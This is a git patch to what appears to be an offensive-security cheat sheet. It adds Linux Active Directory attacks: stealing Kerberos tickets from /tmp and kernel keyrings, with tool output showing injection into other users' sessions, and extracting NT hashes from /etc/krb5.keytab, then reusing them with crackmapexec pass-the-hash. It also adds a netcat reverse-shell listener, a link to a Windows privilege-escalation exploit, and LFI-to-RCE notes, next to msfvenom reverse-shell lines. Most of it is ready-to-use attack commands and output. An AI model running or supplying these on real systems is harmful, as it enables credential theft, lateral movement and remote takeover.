From 3abaa3e23db719404bfdcfbc104ecd4d8f8d45dd Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 25 Nov 2019 23:12:06 +0100 Subject: [PATCH] Linux AD - Keyring, Keytab, CCACHE --- File Inclusion/README.md | 7 +- .../Active Directory Attack.md | 105 ++++++++++++------ .../Reverse Shell Cheatsheet.md | 4 + .../Windows - Privilege Escalation.md | 15 +++ 4 files changed, 97 insertions(+), 34 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index cfa22c2..265c394 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -272,9 +272,14 @@ print('[x] Something went wrong, please try again') ## LFI to RCE via phpinfo() -https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf +PHPinfo() displays the content of any variables such as **$_GET**, **$_POST** and **$_FILES**. + +> By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name. + Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py) +Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf + ## LFI to RCE via controlled log file Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file. diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index d0ad6c7..2e8b144 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -56,9 +56,13 @@ - [Resource-Based Constrained Delegation](#resource-based-constrained-delegation) - [Relay delegation with mitm6](#relay-delegation-with-mitm6) - [PrivExchange attack](#privexchange-attack) - - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab) - [PXE Boot image attack](#pxe-boot-image-attack) - [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect) + - [Linux Active Directory](#linux-active-directory) + - [CCACHE ticket reuse from /tmp](#ccache-ticket-reuse-from-tmp) + - [CCACHE ticket reuse from keyring](#ccache-ticket-reuse-from-keyring) + - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab) + - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab) - [References](#references) ## Tools @@ -1173,38 +1177,6 @@ python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip ``` - -### Extract accounts from /etc/krb5.keytab - -The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure. - -Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user. - -```powershell -$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab -[...] -[26] Service principal: host/COMPUTER@DOMAIN - KVNO: 25 - Key type: 23 - Key: 6b3723410a3c54692e400a5862256e0a - Time stamp: Oct 07, 2019 09:12:02 -[...] -``` - -On macOS you can use `bifrost`. - -```powershell -./bifrost -action dump -source keytab -path test -``` - -Connect to the machine using the account and the hash with CME. - -```powershell -$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN" -CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a -``` - - ### PXE Boot image attack PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it. @@ -1291,6 +1263,73 @@ network.negotiate-auth.trusted-uris="https://aadg.windows.net.nsatc.net,https:// Navigate to any web application that is integrated with our AAD domain. Once at the Office365 logon screen, fill in the user name, while leaving the password field empty. Then press TAB or ENTER. + +## Linux Active Directory + +### CCACHE ticket reuse from /tmp + +List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache` + +> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions + +### CCACHE ticket reuse from keyring + +Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey + +```powershell +[root@Lab-LSV01 /]# /tmp/tickey -i +[*] krb5 ccache_name = KEYRING:session:sess_%{uid} +[+] root detected, so... DUMP ALL THE TICKETS!! +[*] Trying to inject in tarlogic[1000] session... +[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache +[*] Trying to inject in velociraptor[1120601115] session... +[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache +[*] Trying to inject in trex[1120601113] session... +[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache +[X] [uid:0] Error retrieving tickets +``` + +### CCACHE ticket reuse from keytab + +```powershell +git clone https://github.com/its-a-feature/KeytabParser +python KeytabParser.py /etc/krb5.keytab +klist -k /etc/krb5.keytab +``` + +### Extract accounts from /etc/krb5.keytab + +The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure. + +Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user. + +```powershell +$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab +[...] +[26] Service principal: host/COMPUTER@DOMAIN + KVNO: 25 + Key type: 23 + Key: 6b3723410a3c54692e400a5862256e0a + Time stamp: Oct 07, 2019 09:12:02 +[...] +``` + +On macOS you can use `bifrost`. + +```powershell +./bifrost -action dump -source keytab -path test +``` + +Connect to the machine using the account and the hash with CME. + +```powershell +$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN" +CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a +``` + + + + ## References * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 5a4b317..5ccebd6 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -296,6 +296,10 @@ In order to catch a shell, you need to listen on the desired port. `rlwrap` will ```powershell rlwrap nc localhost 80 + +rlwrap -r -f . nc 127.0.0.1 4242 +-f . will make rlwrap use the current history file as a completion word list. +-r Put all words seen on in- and output on the completion list. ``` Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell. diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index beb5e64..ab8f62e 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -36,6 +36,7 @@ * [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012) * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) + * [CVE-2019-1388](#cve-2019-1388) * [References](#references) ## Tools @@ -883,6 +884,20 @@ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=threa python2 send_and_execute.py 10.0.0.1 revshell.exe ``` +### CVE-2019-1388 + +Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html + +Working on : +- Windows 7 +- Windows 10 LTSC 10240 + +Failing on : +- LTSC 2019 +- 1709 +- 1803 + +Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege ## References